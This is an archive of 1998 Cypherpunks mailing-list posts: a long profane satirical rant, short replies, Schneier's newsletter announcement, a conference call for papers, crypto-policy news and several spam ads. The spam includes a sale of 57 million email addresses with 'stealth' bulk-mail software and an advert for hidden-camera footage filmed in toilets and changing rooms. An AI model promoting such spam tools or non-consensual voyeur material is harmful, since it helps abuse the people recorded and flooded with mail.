I'm not complaining, because the FUD generated helped to
cover my ass on the original TruthMonger SoftTarget Tour)
and I think I have the right to be a little self-indulgent
(like it's the first time...right!) and put off finishing
the Bienfait Nutly News "ANARCH IS OUR ONL HOPE!" 
Chrismas Special for a day or so.
  So I think I'll sink into one of my undermedicated, ill-
advised rants about my personal issues, history and problems
which only remotely relate to the goals and purposes behind
the creation of the CypherPunks list.

  Unless you have a lot of idle time on your hands, you might
just want to go ahead and delete the next chapter of SAHMD,
since it will undoubtedly be a semi-coherent, rambling diatribe
with little relevance to your life and/or your interests.
  On the other hand, given my present state of mind, and the
fact that I just found a warm beer in the back of my truck,
the next chapter may well turn out to be one of those classic
works of literature that can only be produced by someone who
finds themself in the Desolate Place, an hour after they have
finished the LastBeerInTheWholeWorld (like Job), and then
is reborn, resurrected, refurbished by the discovery that,
not only is there a God AND a Dog, but there is also another
beer...

  Smoke 'em if you got 'em...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cb0630@hotmail.com
Date: Tue, 30 Jun 1998 18:41:14 -0700 (PDT)
Subject: Re: Data Processing, Translation, Software & Web Localization Services
Message-ID: <199807010644.ZZZ4950@msfc.cseeq.equr.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Sir/Madam,

We are a professional information services company in Hong Kong providing fast, accurate and inexpensive information services since 1993 with more than 100 supporting staff.

Scope of Services:

(1) Chinese/English Word Processing Service &
    Chinese/English Data Preparation Service [Offshore Services Welcome]

* 50+ data entry professionals working on a 24-hour shifting scale.
* 99.95% accuracy level is guaranteed by our "Double Entry System"
* Competitive price to provide you quality results on time and on budget
* Rapid Turnaround
* Confidential Processing
* Year 2000 data conversion / migration
* Offshore Service Welcome: 
  Contract out your projects to save 50+% operational cost!

(2) English/Chinese Translation Services [Offshore Services Welcome]

* 30+ translators with solid experience
* Competitive price to provide you quality results on time and on budget.
  FREE trial and evaluation for first time customers.  
* Specialize in the translation of 
  -  Software localization 
     (User manuals, on-line help systems & user interfaces) 
  - Web site localization
  - Commercial documents
  - Technical manuals and specifications  
  - Architectural proposals, etc.


The popularity of Internet makes it more easy for you to contract out your most labor intensive jobs in your company to information services companies like us to fully utilize inexpensive workforce in our production centers.

You will find that you can concentrate your valuable time and efforts on the most profitable parts of your company. You will then use less labor, less equipment, less office space and less working time to produce more products and services with more profits.

Interested parties please fax the following enquiry form to our customer services department for more information.

                      *** Services Reply Slip *** 

Please fax to (852) 8108 7786

Attn.: Customer Services Department

We are interested in your 
__ Data Processing Service

__ Software Localization Service

__ Web Site Localization Service

__ Chinese Translation Service, please contact us asap.

Our project description: ____________________________________________

_____________________________________________________________________

Company: _________________________________________
Address:__________________________________________
Tel: ____________________
Fax: ____________________
E-mail: _____________________________________________
Web Site: ___________________________________________
Contact Person: _____________________________________
Post: _______________________________________________
Date: _______________________________________________


PS. This e-mail will only be sent to the same account once (you may receive the same message more than once if you have more than one e-mail accounts). Please keep it for future reference. There is no need to remove your name from our database. Sorry for any inconvenience caused.
[CB980630]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dave@bureau42.ml.org>
Date: Wed, 1 Jul 1998 03:16:25 -0700 (PDT)
To: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Subject: Re: http://bureau42.base.org
In-Reply-To: <009C8814.0F703E40.5@west.cscwc.pima.edu>
Message-ID: <Pine.LNX.3.96.980701100528.8133A-100000@bureau42.ml.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

On Wed, 1 Jul 1998, Linda Reed--PCC West Campus CSC wrote:

> I have been getting a lot of requests from people who want to
> know how to get more of the manuscripts of the 'True Story of
> the InterNet' series which is sometimes spammed to the CypherPunks
> Disturbed Male LISP through my account by some inconsiderate psycho
> who has no respect for Bob, who asks only that he be given 'space'
...
> try http://bureau42.ml.org
For the love of God, please, don't.  That goes over my phone line.

Use http://bureau42.base.org/ instead.

...dave


-----BEGIN PGP SIGNATURE-----
Version: GNUPG v0.3.0 (GNU/Linux)
Comment: This is an alpha version!

iQEeBAEUAwAGBQI1mgotAAoJEJKCwqQDooIFjcED/R4EPP0jKh3LMJdIm1orYc308Dvl+31v
1nd1poiv+OD2jCNjcSk/CcKnG1+S2WWrMFnhdyGn9MyAzSX44N/v7eota8yNmtrld0JZG91J
F+cwkrdZ524qj7HHllerOnitQ2GRef92/3f+Iql6KJkE7gCj0A5cokqgKSiJvIn3Kt85A/0Y
WfnvLEyLtmZXT2f/wILQ638r+oHMQ/hZeRxlYxXTpWB4kcqF9xu4NmgPdkjVpAPTf4mwah76
4p4DeBAeBiJbaDoaHbIvioPU7MHipxu1TVq3vocgBXfvEDSMvdNHcQ9eR9WUVe8f1R0yubeB
q9/E7Hr2tuCxj9BlT51tLdeuQQ==
=Q8mn
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jackson Dodd <jackson@usenix.ORG>
Date: Wed, 1 Jul 1998 10:12:10 -0700 (PDT)
To: dbworld@cs.wisc.edu
Subject: 1998 USENIX Annual Technical Conference - Call for Papers
Message-ID: <199807011714.KAA16480@usenix.ORG>
MIME-Version: 1.0
Content-Type: text/plain



USENIX 1999 Annual Technical Conference
June 7-11, 1999
Monterey Conference Center
Monterey, California, USA

For the full call for submissions, see 
http://www.usenix.org/events/usenix99

Papers due: 			  December 2, 1998
Author notification: 		  January 20, 1999
Camera-ready final papers due: 	  April 27, 1999
Registration materials available: March, 1999

The 1999 USENIX Technical Conference Program Committee seeks 
original and innovative papers about the applications, architecture,
implementation, and performance of modern computing systems. 
As at all USENIX conferences, papers that analyze problem areas 
and draw important conclusions from practical experience are 
especially welcome. Some particularly interesting application 
topics are:

Availability
Distributed caching and replication
Embedded systems
Extensible operating systems
File systems and storage systems
Interoperability of heterogeneous systems
Mobile code
Mobile computing
Multimedia
New algorithms and applications
Personal digital assistants
Quality of service
Reliability
Security and privacy
Ubiquitous computing and messaging
Web technologies

TUTORIALS
We are also accepting proposals for tutorials.  USENIX's well-respected 
tutorial program offers intensive, immediately practical tutorials on 
topics essential to the use, development, and administration of advanced
computing systems. Skilled instructors, who are hands-on experts in 
their topic areas, present both introductory and advanced tutorials 
covering topics such as:

System and network administration
Java and Perl topics
High availability, scalability, and reliability
Programming tools and program development
Portability and interoperability
System and network security
Client-server application design and development
Sendmail, DNS, and other networking issues
GUI technologies and builders
WWW and CGI technologies
Performance monitoring and tuning
Freely distributable software

INVITED TALKS
The Invited Talks coordinators welcome suggestions for topics and
requests proposals for particular talks. In your proposal state 
the main focus, include a brief outline, and be sure to emphasize 
why your topic is of general interest to our community. Please submit 
via email to ITusenix@usenix.org.

For the full call for submissions, see 
http://www.usenix.org/events/usenix99
====================================================================
USENIX is the Advanced Computing Systems Association. Since 1975,
USENIX has brought together the community of engineers, system
administrators, and technicians working on the cutting edge of the
computing world. For more information about USENIX:

1. URL: http://www.usenix.org
2. Email to office@usenix.org 
3. Fax: 510.548.5738 
4. Phone: 510.528.8649








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 1 Jul 1998 09:53:57 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 1, 1998
Message-ID: <199807011650.LAA31630@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



=============================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.
=============================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@cit.nepean.uws.edu.au>
Date: Tue, 30 Jun 1998 21:36:32 -0700 (PDT)
To: bill payne <billp@nmol.com>
Subject: Re: NSA and crypto algorithms
In-Reply-To: <359934DE.1B4@nmol.com>
Message-ID: <Pine.LNX.3.93.980701133329.165B-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 30 Jun 1998, bill payne wrote:

> It is EASY to make mistakes when designing crypto algorithms.

[...]

> My suprise at gaining access to NSA crypto algorithms was how
> simple they were.

The second stament follows logicly from the first.  Simple algorithums are
easyer to analise for mistates.


- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNZmuSqQK0ynCmdStAQFHowP/efP6rwDRJdjNhXvcS9rRbJW9tB10YqtP
6SCjzgCQj6W2rZSDevehIthNBn2iF0yo+rxkHA6qSYIR4y4FbyZQNSAJyCJO5i5s
iEl8Prg6Mt2FgPRxyqgSbDaVqprBaa2kkHXHiCB0Uvf4FIdc3SjMtPnU0B+ijC3v
fXmFqRvpe9o=
=7en9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Wed, 1 Jul 1998 09:44:44 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Daily News Wed Jul 1 '98
Message-ID: <19980701142321.2253.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

New: STUFFED - the News & Babes Daily!

<img src=http://stuffed.net/98/7/1/cover.gif
width=300 height=380 border=0 alt='Click Here For STUFFED, The NEW Daily Tabloid
News And Babes Color Supplement From Eureka!'>

Click here to read it: http://stuffed.net/98/7/1/



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 1 Jul 1998 14:10:18 -0700 (PDT)
To: lawya@lucs-01.novell.leeds.ac.uk
Subject: Warning to court clerk
Message-ID: <359AA4DA.CCD@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Wednesday 7/1/98 2:59 PM

John Young

I will fax the two sheets from the clerk to you later this afternoon.

Morales and I will try to meet on his way home from work
to get his signature.

http://www.jya.com/sec062998.htm
http://www.jya.com/whp063098.htm

will likely cause MUCH MORE UNPLEASANTNESS .. for clerks and judges.

Let's hope this matter is promptly settled before it gets WORSE.

Later
bill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Wed, 1 Jul 1998 16:07:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Statist Changes - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C8893.06B8B280.5@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Statist Change - SPACE ALIENS HIDE M DRUGS!!!
______________________________________________

 "The more you make change, the more your balance books 
 remain the same."
~  Chevy Change
   Founder - Saturday Night Live Change Manhatten Bank
  "Statist Change In The SidePocket - ou Can Bank On It."

  Delbert McClinton, a paid media informant for a shell of 
the former Time Bandits, the Nutly Noose, sent me a private
email, the contents of which which ethics and propriety 
forbid me to disclose, although it can be PartyPhrased as,
"So why the fuck do you keep sending your goddamn SPAM to
 the CypherPunks list, you illiterate, drunken asshole?!?!?"

The Real (TM) Answer #436-C.2:
  "Because I'm a CypherPunk, ShitForBrains!!!...!!!"


 "I don't care what they say about me, as long as they spell
 my name wrong."
~  Declan McCaulkin
   Former OldSpiceBoy who recently cut a solo album, "ArmGlue"

  Declan McCullagh (ever notice that I only get his name right
when I'm insulting him?), who used to be an unread, but lightly
respected journalist for the Netly News (it is better to remain
unread and thought a Tool, than to get a byline and remove all
doubt) sold the soles of his shoes to pay the piper, only to
discover that his Controllers at Time Magazine, a subsiduary
of a fidicuary corporation, Slime, Inc., wholly owned by the
MainStream Enquirer (Gyrating Minds Want To Be Snowed) had
already paid the 'fiddler', and thus got to NameThatTune, since
they were astute enough to realize that the 'original' quote
was, "Those who learn from the mistakes of the past, can
profitably repeat them."
  So now Declan, currently only a part-time employee of the
CIA/FBI/DEA/NSA (and ASecretThreeLetterOrganizationWhich-
SecretlyControlsTheWholeWorldToBeNamedLater) as a result of
being fired as a Cuspected CypherPunks Cpy, but rehired on
a consultancy basis to be a Shadow of his former self...

  Damn...lost my train of thought, again. I guess that's why
they don't pay me the BigBucks...

  Anyway, if Declan had been one of the original coconspirators
(sometimes spelled with a hyphen) in the Secret Plot Against
The CypherPunks List, instead of a JohnnyComeLately trying to
jump on the bandwagon, after believing Jim Bell when he told
Declan how great prison food is, he would be aware that a
chapter of a previous 'True Story Of The InterNet' manuscript
pointed out that a member of an elite group of dribblers
who wore green bibs with numbers on them, the CelticPunks,
Kevin McHale (if that is his *real* name...), said of a
fellow CelticPunks member, Danny Angst, "Sure, he's actually 
a slobberer, but he's *our* slobberer!"
  This quote was used to illustrate my point that the late
Dr. Dimitri Vulis, KOTM, an IgnorantInsaneInconsiderateIgnoble
Asshole, was a 'CypherPunks' IgnorantInsaneInconsiderateIgnoble
Asshole (TM). PissAnt Dale Thorn was a 'CypherPunks' PissAnt.
Cocksucker John Gilmore was a 'CypherPunks Cock Cucker' (not
to be confused with the Criminal Cocksucker of Canada). Statist
GuberMint Chill, Kent Crispin, was a 'CypherSpooks' Statist
DoubleMint Chill, and a secret member of the Circle of Eunuchs.
  The veteran elitists on the list accused me of being a
elitist neophyte who was bitter over not having received a
CecretSypherPunksDecoderRing (TM), but none of this really
has anything to do with the point I am trying to make...

"When Outlaws are outlawed, only Outlaws will be outlaws."
~ An Inlaw of Billy the Kid (aka-BadBillyG, BadBillyC, Bill
  Frantz, Bill Stewart, William Geiger III, Bill C. May, etc.)

(Anyone complaining about the foregoing not making any sense
is obviously hanging around with David Byrne because he is
rich and famous, and not because they truly love and understand
his music.)

Why I Am Spamming The CypherPunks List #A-497-2.3:
  I am the TruthMonger.
  The dedication of my life to becoming one with the MadDog-
InPossessionOfTheLastFalseSmile resulted in my being forcefully
unbriscrived from the Jack Nicholson Fan Club Mailing List,
because "THE CAN'T *HANDLE* THE TRUTH!"
  In loneliness and depravation, I decided to sribvive to the
Suicide Mailing List, but it turned out to be just a corporate-
sponsored pimple on the butt of the InterNet, created as a means
to feature the Nike 'Just Do It' logo. (Besides, there was only
one other member on Suicide Mailing List, and she only sent a
single post, a suicide note, helping me to realize that she had
really belonged on the list, while I was just a rubbernecker.
  I then subscribed to the AIDS Support List, but was kicked off
when they discovered that I didn't have AIDS, and was just there
to try and meet women.
  On advice of legal counsel, and Jerry Falwell, I will refrain 
from describing my experiences on the Christian Pre-Teen Mailing
List, since charges are still pending.
  
  Why did I subscribe to the CypherPunks Mailing List? It was    
the last one...I had been kicked off of all the others.
  I thought that this time, I might be accepted for who I
really pretend to be, since I believed that the other list
members would be delighted to know that I had 'broken PGP,'
although I couldn't provide any proof of it, at the time.
Also, I had just completed work on a totally unbreakable
encryption system, although I was hesitant to share details
with others, in fear that someone might figure out how it
worked, thus compromising the total security it provided.
  When the rest of the list suckbikers attacked me in fits of
RayCharlesRage, I realized that they, like myself, suffered
from Tourette Syndrome, and were not just pretending to,
like Andrew Dice Clay. I suddenly realized that encryption
was a science that had come about as a result of hundreds of
years of misdiagnosis of Dyslexia and Attention Deficit
Disorder (not to be confused with Federal Deficit Disorder,
which causes politicians peering into taxpayer pockets to
see a Bottomless Pit).
  I realized that these people were sick motherfuckers...
  I was home...


If ou Can't Kill The List ou Love, Kill The One ou're On:
  I have never been fond of the CypherPunks Mailing List, or
its subscribers. The list and list members are a constant
reminder that I am a mental misfit and a social outcast,
chased by the torch-bearing angry mob of decent, law-abiding
NetiZensComeLately back to the CypherPunks Cecret Castle,
cleverly disguised as a Mailing List.
  It is indeed a great irony that I, a pretentious interloper
on the list, was ultimately responsible for single-handedly
rescuing the CypherPunks list from death and oblivion.
  
  I know what you're thinking: "Drop the crack pipe, and slowly
back away from the keyboard..."
  But it's True (TM), I swear to Dog.

  I'm not claiming to be some kind of Hero, or to be Dustin
Hoffman, or anything, since it came about quite by accident.
  At the time of the Legendary CypherPunks Censorship Crisis
(not to be confused with the CypherPunks Moderation Experiment),
I did everything I could to forment dissent, cause fractious
fractal fractures between the list members, shooting and pissing
at everyone and everything in sight, even myself, suffering
several serious foot-wounds in the process.
  It was only later, when it became obvious that the CypherPunks
list was going to survive, and prosper, and that, in fact, a
beautiful Toad had been transformed, by the KissOfDeath, into
a plethora of ugly PrincesAndPrincesses, that I realized that
the CypherPunks Censorship Crisis had been an attempt to destroy
the list, by making it just another bland, everyday imitation
of PoliticallyCorrectMasturbation that would make our mothers
proud of us, as long as we didn't stain the sheets too badly.
  In retrospect I realized that I had inadvertently saved the
list from a Zombie-like future as just another sidestreet on
the Information Highway by using my posts to promote and
glorify violent anarchy against reason, common sense, and
everything that my mother and father taught me in the hope
of saving me from being a bad influence on myself, little
realizing that I was actually epitomizing what the CypherPunks
Disturbed Male LISP was really about.

  I realize that I am enclosing myself in an aura of grandoise
self-importance once again, since most of the list subscribers
fell into the same knee-jerk reactions as I did, even the ones
who were calling the loudest for censorship, but doing so by
shitting and pissing on the OfficiallyPerceivedTroubleMakers
on the list, so, in actual fact, one might surmise that the
CypherPunks Mailing List was not so much 'saved' by anyone,
as merely confirming itself to be an IndestructibleEntity that
would survive as long as their was a single individual on the
face of the earth who continued to respond to a perfectly
reasonable and valid statement with, "Oh yeah? Sez who?", or
a pair of bickering children screaming, "Did so!/Did not!/Did
so!/Did not!"

  Still, I think I deserve a CypherPunksSecretDecoderRing...


"Question Anonymity!"
~ Janet Renal
  Department of Blow Jobs
  "Why not? Are you 'gay', or something?"

[I am going to take a BeerBreak, and give you a chance to
 check the archives, in order to confirm that the next
 chapter of SAHMD, which deals with the concepts underlying
 the formation of the Army of Dog, was first mentioned on
 the CypherPunks list by Tim C. May, who really did invent
 everything, including the Wheel (doing it in his sleep),
 making the rest of us just dirt under his CypherPunks Elitist
 Feet (TM).]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Wed, 1 Jul 1998 15:49:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Security Newsletter from Bruce Schneier
Message-ID: <199807012249.RAA08149@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


I've just started a crypto newsletter: CRYPTO-GRAM is a free monthly 
email  newsletter on cryptography from Bruce Schneier (author of 
Applied Cryptography, inventor of Blowfish, general crypto pundit 
and occasional crypto curmudgeon).

You can subscribe to CRYPTO-GRAM:

	on the WWW, at http://www.counterpane.com/crypto-gram.html

	by sending e-mail to crypto-gram-subscribe@chaparraltree.com

In the May issue:

	The Secret Story of Non-Secret Encryption.  The story
	behind the British claim that they invented public-key
	cryptography first.

	Advanced Encryption Standard.  How the government
	is replacing DES.

In the June issue:

	Side Channel Attacks.  What's the big idea behind the
	recent press announcements about breaking smart
	cards by analyzing the power line?

	Risks of Key Recovery, Key Escrow, etc.  Why
	implementing a FBI-style key recovery scheme will
	do more to hurt national security than simply letting
	people communicate.

Other regular features include:

	News.  Links to the interesting crypto stories.

	War Stories.  There are security lessons to learn
	from all over, not just from computer geeks.

	Resources.  Summaries of the good Web resources
	on privacy, security, and encryption.

We understand and respect your right to privacy.  You are 
receiving this email only because you have demonstrated an 
interest in the areas of privacy, security and encryption. 
You should also know that we would not sell, rent or share 
our mailing list should you decide to subscribe. Our goal 
is to maintain and develop a relationship of integrity and 
trust with our subscribers.  The members of this list are 
not for sale.  Period.

If you have any questions, don't hesitate to contact me.  
Otherwise, I hope you'll take a moment to subscribe to 
CRYPTO-GRAM at: 

      http://www.counterpane.com/crypto-gram.html
      or mailto:crypto-gram-subscribe@chaparraltree.com
 
Regards,

Bruce 
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
                                            http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 8tIBa9867@thegrid.net
Date: Wed, 1 Jul 1998 21:53:02 -0700 (PDT)
To: because2z@earthlink.net
Subject: THE BEST ADULT WEBMASTER PRODUCTS
Message-ID: <199807020452.VAA08105@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


UPDATED! DUE TO POPULAR DEMAND WE HAVE
A NEW EMAIL ADDRESS FOR YOU TO SEND REQUESTS
AND A TELEPHONE NUMBER!  (818) 881-2679 


THE FIVE HOTTEST ADULT WEBMASTER PRODUCTS
PREVIOUSLY OFFERED ONLY NOW TO SELECT SITES
CAN NOW BE YOURS AT AFFORDABLE PRICES!

BETTER ACT NOW OR YOU LOSE OUT!
THE FIRST 20 SITES CAN GET THESE GREAT PRODUCTS:

1. PornholioVision: Over 2000 10 minute Straight Clips, with Full screen option and 3 fps on a 28.8 modem. Includes a search engine and full descriptions of all clips.

2. GayholioVision:  Same as Pornholio, except all Gay clips, and
descriptions!

3. Voyeur Vision:  Over 50 Hidden Camera's with full color cameras inside toilets, looking up at the girls pussy!! also we have gyno cams inside doctors offices, and mall cams inside changing rooms.

4. Cyberfold: A full site dedicated to one model each and every month. Contains over 300 images, 1 hour of video clips, and interactive sections where you tell the girl where you tell the girl what to do with the toys and where to put them.  Each month has a different theme, and totally awesome graphics.  You can download them yourself, or we can serve them for you.

You get 6 issues for the price of 1 this month!!!

5. Guyberfold: Same as Cyber fold but with a Gay film star each month. (this product is designed by gay producers for gay members!!!

If you are interested in these hot products,

send an email to pornholiodave@youwonthis.com

Any problems sending mail, call me at  (818) 881-2679
during business hours Pacific Time (California)

and tell me what products you would like to see.

Tell me your url (http://??) of your website too, please

FREE SAMPLES AND FREE TRIALS
FOR QUALIFIED ADULT WEBMASTERS.

You have seen our products all over the web, and now it's time to get them for yourself.


Dave


This list has been filtered with the list at 
http://remove-list.com  (a free service
to remove your email address permanently
from mailings like this).  Please excuse the
intrusion for this important correspondence.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 2 Jul 1998 07:11:16 -0700 (PDT)
To: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Subject: Re: Statist Changes - SPACE ALIENS HIDE MY DRUGS!!!
In-Reply-To: <009C8893.06B8B280.5@west.cscwc.pima.edu>
Message-ID: <Pine.GSO.3.95.980702070921.10605E-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


This is one of the better rants I've read in a while. You left out my
Trilateral connection, though.

-Declan

>   So now Declan, currently only a part-time employee of the
> CIA/FBI/DEA/NSA (and ASecretThreeLetterOrganizationWhich-
> SecretlyControlsTheWholeWorldToBeNamedLater) as a result of
> being fired as a Cuspected CypherPunks Cpy, but rehired on
> a consultancy basis to be a Shadow of his former self...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 2 Jul 1998 04:26:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: IE Frees Crypto
Message-ID: <199807021125.HAA06437@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Source: http://go2.guardian.co.uk/paper.html
Thanks to IB
  
The Guardian Online, Microfile, July 2, 1998

ANNOUNCING the most liberal national policy yet on
the encoding of data sent over the Internet, the Irish 
government last week showed it has every intention 
of being an international centre for electronic commerce. 
Ireland listened to its many resident technology companies, 
rather than bowing to pressure from the US, which wants 
access to encrypted messages. Ireland places no
restrictions on the use, import or export of encryption
products. Individuals can choose to offer a plain text 
version of the encrypted document or hand over a key, 
if a search warrant is proffered. The document was 
released to coincide with the Irish visit of President 
Clinton's Internet tsar, senior trade advisor Ira Magaziner, 
who hinted that his views on encryption diverge from 
those of his boss. "Within the next year, there'll be such 
an availability of high-level encryption that the market 
will take over," he said.

-----

Leads on getting this paper would be appreciated.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Thu, 2 Jul 1998 11:04:21 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 2, 1998
Message-ID: <199807021753.MAA07657@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



=============================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.
=============================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aqwsc1a@cpckor.com.tw
Date: Wed, 1 Jul 1998 23:55:23 -0700 (PDT)
To: aqwsc1a@prodigy.net
Subject: Email 57 Million People for $99
Message-ID: <199807013333AAA37317@post.cpckor.com.tw>
MIME-Version: 1.0
Content-Type: text/plain


          57 MILLION
EMAIL ADDRESSES
FOR ONLY $99 


       
  You want to make some money? 


I can put you in touch with over 50 million people at virtually no cost.


Can you make one cent from each of theses names?


If you can you have a profit of over $500,000.00 



      That's right, I have 57 Million  Fresh  email 


addresses that I will sell for only $99. These are all 


fresh addresses that include almost every person 


on the Internet today,  with no duplications. They are 


all sorted and ready to be mailed.  That is the best 


deal anywhere today !  Imagine selling a product for 


only $5 and getting  only a 1/10% response.   That's  


$2,850,000  in your pocket !!! 
Don't believe it? People are making that kind of 


money right now by doing the same thing, that is 


why you get so much email from people selling you 


their product....it works !  I will even tell you how to 


mail them with easy to follow step-by-step 


instructions I include with every order.  These 57 


Million email addresses are yours to keep, so you 


can use them over and over and they come on 1 CD.  


This offer is not for everyone.


If you can not see the just how excellent the


risk / reward ratio in this offer is then there is 


nothing I can do for you. 


To make money you must stop dreaming 


and TAKE ACTION.



****************************************


THE BRONZE MARKETING SETUP


57,000,000 email addresses on CD


These name are all in text files


ready to mail!!!


$99.00


****************************************


THE SILVER MARKETING SETUP


57,000,000 email addresses on CD


These name are all in text files


ready to mail!!!       AND


8 Different Bulk email programs 


and tools  to help with your mailings


and list management.


$ 139.00


****************************************


THE GOLD MARKETING SETUP


VIRTUALLY EVERYTHING!!


57,000,000 email addresses on CD


These name are all in text files


ready to mail!!!       AND


8 Different Bulk email programs 


and tools  to help with your mailings


and list management.


             AND 


Over 500 different Business Reports


now being sold on the Internet for up to


$100 each. You get full rights to resell these reports.


With this package you get the email addresses, 


the software to mail them AND ready to sell  


information products.


AND ...... 


.. a collection of the 100 best money making


adds currently floating around on the Internet.


$ 189


****************************************


THE PLATINUM MARKETING SETUP


FOR THOSE READY TO "OWN THE NET"


57,000,000 email addresses on CD


These name are all in text files


ready to mail!!!       AND


8 Different Bulk email programs 


and tools  to help with your mailings


and list management.


             AND 


Over 500 different Business Reports


now being sold on the Internet for up to


$100 each. You get full rights to resell these reports.


With this package you get the email addresses, 


the software to mail them AND ready to sell  


information products.


AND ...... 


.. a collection of the 100 best money making


adds currently floating around on the Internet.


AND ......


FLOODGATE & GOLDRUSH FULLY REGISTERED SOFTWARE!!


This is the Number 1 most powerful mass mailing software in the world today.
There is nothing that can compare for speed, reliability, performance, and the
ability to use "stealth" functions.


This is the package that will allow you to use the net as your own personal
"money tree" at will!!!


$ 379


****************************************
SEVERAL WAYS TO ORDER !!!


IF YOU ORDER BY PHONE WE WILL SHIP YOUR CD CONTAINING THE 57 MILLION + NAMES
WITHIN 12 HOURS OF YOUR ORDER!!!


  1) WE ACCEPT:  AMERICAN EXPRESS OR
    
                               VISA <> MASTERCARD
     TYPE OF CARD  AMX / VISA / MC??_______________


      EXPIRATION DATE   ___________________________
     NAME ON CREDIT CARD________________________
     CREDIT CARD #________________________________
     BILLING ADDRESS ____________________________
     CITY_________________________________________
    STATE________________ZIP_____________________
   PHONE INCLUDE AREA CODE___________________
   
    EMAIL ADDRESS______________________________ 


        WE WILL BILL selected amount to your account plus the following
shipping costs


        SHIPPING  COST OF 3.85 FIRST CLASS MAIL


        SHIPPING COST OF  15.00  24 HOUR EXPRESS MAIL /  FEDERAL EXPRESS
        SALES TAX  added to AR residents 
  >>> Send correct amount in cash, check or money


order to:


  >>> FIRE POWER!!
  >>> 1320 N. "B" St., Suite 112-24
  >>> Fort Smith, AR  72901



   2) Send the same above requested credit card 


information to above address. 
   


   3) Call phone # 530-876-4293.  This is a 24 hour phone 


number to place a CREDIT CARD order.



FIRE POWER! is a private company and is not affiliated with, or endorsed by,
AOL, MSN, or any other Internet Service Provider.


Copyright 1998


All rights res




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: free@church.com
Date: Thu, 2 Jul 1998 16:40:52 -0700 (PDT)
To: <cypherpunks-announce-request@toad.com>
Subject: GIVING AWAY $432,000 ... For FREE !
Message-ID: <199807022340.QAA04430@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello

**Note this is not a bulk email. This is sent out to only serious 
non-profit/profit organizations interested in what we have to 
offer.
 
My name is Sharon Haley.
I am a representative for The INDIANA JONES Corporation. 

We have created a program that will allow your family,
business, church or organization, an opportunity to receive
           
        THOUSANDS of dollars Each and EVERY MONTH 


by simply signing up as a customer to try our service.
                       For FREE...

Indiana Jones has joined the
600 Billion dollar Telecommunications Industry.

And We will donate up to 8% of our profits to YOU.

You could receive 
      $10,000....$100,000....$400,000 Dollars or more
                  
                   EACH and EVERY MONTH

If you have a large organization, you could use our program
as a Fundraiser to generate 
              Tens of thousands of Dollars

                       or as much as

           Six Million Dollars ($6,000,000.00)

to support your group or research programs
for Cancer, Aids, and other good causes.

You can also sign-up your business and use this money to
support all the events and organizations that you sponsor
throughout the year; such as corporate conventions,
little league groups, girl scouts, boy scouts
and even your local community...
the list goes on.

We are reuniting families all across the country by
donating money to help them get their dreams back,
spend more time with their love ones and support their
